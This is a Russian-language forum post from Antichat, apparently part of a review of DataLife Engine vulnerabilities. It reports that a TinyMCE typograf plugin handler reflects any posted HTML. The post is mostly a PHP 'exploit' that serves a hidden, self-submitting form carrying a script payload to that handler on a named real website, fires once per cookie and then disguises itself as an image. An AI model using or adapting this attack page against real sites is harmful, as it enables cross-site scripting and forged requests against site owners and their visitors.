Форум АНТИЧАТ - Показать сообщение отдельно - [ Обзор уязвимостей DataLife Engine ]

Работает любой хтмл тег отосланный пост запросом на engine/editor/jscripts/tiny_mce/plugins/typograf/handler.php

ТИПА ЭКСПЛОИТ
PHP код:

PHP код:


		
			
<?php 

$value = urlencode("<script>alert('HACKED BY KZPROMO trololo');</script>"); 

if($_GET['unset'] == "time") unset($_COOKIE['time']); 

if(!isset($_COOKIE['time'])) 

{ 

setcookie("time",time(),time()+3600); 

echo <<<HTML 

<html> 

<head> 

</head> 

<body> 

<center> 



<form name="hack" action="https://gomel-sat.net/engine/editor/jscripts/tiny_mce/plugins/typograf/handler.php" method="post"> 

<input type="text" name="text" value='$value' style="boder:none;FONT: 0px Tahoma; border:0px solid #FFFFFF;" border="0"> 

</form> 



<script> 

document.hack.submit(); 

</script> 

</body> 

</html> 

HTML; 



} 

else {  

header("Content-type: image/jpg"); 

$image = imagecreatefromgif('smile.jpg'); 

imagegif($image); 

imagedestroy($image); 

} 



?>

Автор: kzpromo